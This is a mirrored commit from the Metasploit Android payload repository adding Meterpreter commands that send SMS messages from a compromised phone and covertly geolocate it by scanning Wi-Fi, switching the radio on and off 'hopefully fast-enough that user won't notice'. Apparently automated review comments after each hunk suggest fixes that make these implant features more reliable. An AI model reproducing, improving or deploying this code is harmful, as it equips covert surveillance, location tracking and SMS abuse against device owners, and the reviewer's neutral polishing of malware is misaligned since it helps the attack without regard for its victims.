mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-24 10:09:49 +02:00

send_sms + wlan_geolocate

Joao Pena Gil 2015-07-19 22:59:59 +01:00
parent 5700d04431
commit e157b4e3cf
3 changed files with 216 additions and 0 deletions
java/androidpayload/library/src/com/metasploit/meterpreter

@ -4,6 +4,8 @@ import android.content.Context;
import android.os.Handler;
import android.os.Looper;
import com.metasploit.meterpreter.wlan_geolocate;
import com.metasploit.meterpreter.android.send_sms_android;
import com.metasploit.meterpreter.android.check_root_android;
import com.metasploit.meterpreter.android.dump_calllog_android;
import com.metasploit.meterpreter.android.dump_contacts_android;
@ -145,6 +147,8 @@ public class AndroidMeterpreter extends Meterpreter {
mgr.registerCommand("geolocate", geolocate_android.class);
mgr.registerCommand("dump_calllog", dump_calllog_android.class);
mgr.registerCommand("check_root", check_root_android.class);
mgr.registerCommand("send_sms", send_sms_android.class);
mgr.registerCommand("wlan_geolocate", wlan_geolocate.class);
}
return getCommandManager().getNewCommands();
}
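Review bot: `wlan_geolocate` breaks the convention every other handler in these two hunks follows: the rest are imported from `com.metasploit.meterpreter.android` and carry the `_android` suffix, while this one sits in `com.metasploit.meterpreter` without it. Judging by the `com.metasploit.meterpreter.AndroidMeterpreter` import used by the new command classes in this commit, that is also this class's own package, which would make `import com.metasploit.meterpreter.wlan_geolocate;` redundant. The handler casts to `AndroidMeterpreter` and uses `WifiManager`, so it is Android-only; I would move it to `com.metasploit.meterpreter.android` as `wlan_geolocate_android` and register that class in the `registerCommand` call. Both hunks cut through the file, so the enclosing method is only partly visible here.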

@ -0,0 +1,109 @@
package com.metasploit.meterpreter.android;
import android.telephony.SmsManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Intent;
import android.content.IntentFilter;
import android.app.Activity;
import android.content.Context;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.command.Command;
public class send_sms_android implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_SMS_ADDRESS = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9001);
private static final int TLV_TYPE_SMS_BODY = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9002);
private static final int TLV_TYPE_SMS_SENT = TLVPacket.TLV_META_TYPE_BOOL
| (TLV_EXTENSIONS + 9021);
private static final String address = "address";
private static final String body = "body";
@Override
public int execute(Meterpreter meterpreter, TLVPacket request,
TLVPacket response) throws Exception {
String number = request.getStringValue(TLV_TYPE_SMS_ADDRESS);
String message = request.getStringValue(TLV_TYPE_SMS_BODY);
SmsManager sm = SmsManager.getDefault();
if (message.length() > 160) {
}
else {
String SMS_SENT = "SMS_SENT";
String SMS_DELIVERED = "SMS_DELIVERED";
AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
final Context context = androidMeterpreter.getContext();
PendingIntent sentPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_SENT), 0);
PendingIntent deliveredPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_DELIVERED), 0);
// For when the SMS has been sent
context.registerReceiver(new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
String result = "";
switch(getResultCode()) {
case Activity.RESULT_OK:
result = "Transmission successful";
break;
case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
result = "Transmission failed";
break;
case SmsManager.RESULT_ERROR_RADIO_OFF:
result = "Radio off";
break;
case SmsManager.RESULT_ERROR_NULL_PDU:
result = "No PDU defined";
break;
case SmsManager.RESULT_ERROR_NO_SERVICE:
result = "No service";
break;
}
}
}, new IntentFilter(SMS_SENT));
// For when the SMS has been delivered
context.registerReceiver(new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
String result = "";
switch(getResultCode()) {
case Activity.RESULT_OK:
result = "Transmission successful";
break;
case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
result = "Transmission failed";
break;
case SmsManager.RESULT_ERROR_RADIO_OFF:
result = "Radio off";
break;
case SmsManager.RESULT_ERROR_NULL_PDU:
result = "No PDU defined";
break;
case SmsManager.RESULT_ERROR_NO_SERVICE:
result = "No service";
break;
}
}
}, new IntentFilter(SMS_DELIVERED));
// Get the default instance of SmsManager
SmsManager smsManager = SmsManager.getDefault();
// Send a text based SMS
smsManager.sendTextMessage(number, null, message, sentPendingIntent, deliveredPendingIntent);
// smsManager.sendTextMessage(number, null, message, null, null);
response.addOverflow(TLV_TYPE_SMS_SENT, true);
}
return ERROR_SUCCESS;
}
}
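Review bot: The `if (message.length() > 160) { }` branch in `execute` is empty, so an over-length body is silently dropped while the method still returns `ERROR_SUCCESS`, and if `getStringValue` can return null the length check throws before any response is built. I would make the failure explicit with `if (message == null || message.length() > 160) { return ERROR_FAILURE; }`. In the other branch `TLV_TYPE_SMS_SENT` is set to true as soon as `sendTextMessage` returns: both receivers compute `result` and discard it, so the reported value does not reflect the actual result code. The two anonymous receivers are also registered on every call and never unregistered, so they accumulate on the context. `sm`, `address` and `body` are unused and can be removed.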

@ -0,0 +1,103 @@
package com.metasploit.meterpreter;
import java.util.List;
import android.app.Activity;
import android.os.Handler;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.net.wifi.ScanResult;
import android.net.wifi.WifiManager;
import android.os.Bundle;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.TextView;
import android.widget.Toast;
import android.util.Log;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.command.Command;
public class wlan_geolocate implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_WLAN_GROUP = TLVPacket.TLV_META_TYPE_GROUP
| (TLV_EXTENSIONS + 9022);
private static final int TLV_TYPE_WLAN_BSSID = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9023);
private static final int TLV_TYPE_WLAN_SSID = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9024);
private static final int TLV_TYPE_WLAN_LEVEL = TLVPacket.TLV_META_TYPE_UINT
| (TLV_EXTENSIONS + 9025);
WifiManager mainWifi;
WifiReceiver receiverWifi;
List<ScanResult> wifiList;
Object scanready = new Object();
boolean WifiStatus;
class WifiReceiver extends BroadcastReceiver {
// This method call when number of wifi connections changed
@Override
public void onReceive(Context c, Intent intent) {
synchronized (scanready){
wifiList = mainWifi.getScanResults();
scanready.notifyAll();
}
}
}
@Override
public int execute(Meterpreter meterpreter, TLVPacket request,
TLVPacket response) throws Exception {
AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
final Context context = androidMeterpreter.getContext();
mainWifi = (WifiManager) context.getSystemService(context.WIFI_SERVICE);
WifiStatus=mainWifi.isWifiEnabled();
if (WifiStatus == false)
{
// If wifi is disabled, enable it
mainWifi.setWifiEnabled(true);
}
receiverWifi = new WifiReceiver();
context.registerReceiver(receiverWifi, new IntentFilter(WifiManager.SCAN_RESULTS_AVAILABLE_ACTION));
mainWifi.startScan();
wifiList=null;
synchronized (scanready){
while(wifiList == null) {
// Log.i("AAA","Waiting for scan results..");
scanready.wait(1000);
}
//If wifi was disabled when process started, turn it off again
//hopefully fast-enough that user won't notice =)
if (WifiStatus == false){
mainWifi.setWifiEnabled(false);
}
for(int i = 0; i < wifiList.size(); i++){
TLVPacket pckt=new TLVPacket();
pckt.addOverflow(TLV_TYPE_WLAN_SSID,wifiList.get(i).SSID);
pckt.addOverflow(TLV_TYPE_WLAN_BSSID,wifiList.get(i).BSSID);
int level=0;
level = mainWifi.calculateSignalLevel(wifiList.get(i).level,100);
pckt.addOverflow(TLV_TYPE_WLAN_LEVEL,level);
response.addOverflow(TLV_TYPE_WLAN_GROUP, pckt);
}
}
return ERROR_SUCCESS;
}
}
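Review bot: `wifiList=null;` runs after `mainWifi.startScan()` and outside `synchronized (scanready)`, so a scan broadcast delivered in between is overwritten and the `while(wifiList == null)` loop keeps waiting. The loop has no upper bound, so a null return from `getScanResults()` blocks the command indefinitely. Move the reset ahead of `context.registerReceiver(...)` as `synchronized (scanready) { wifiList = null; }`. The receiver is never unregistered, so each call leaves another `WifiReceiver` attached to the context; add `context.unregisterReceiver(receiverWifi);` once the results have been copied into the response. The class comment should also state that the command enables and then disables Wi-Fi when it was off, since that state change is an observable side effect on the device, and the imports of `Activity`, `Handler`, `Bundle`, `Menu`, `MenuItem`, `TextView`, `Toast` and `Log` are unused.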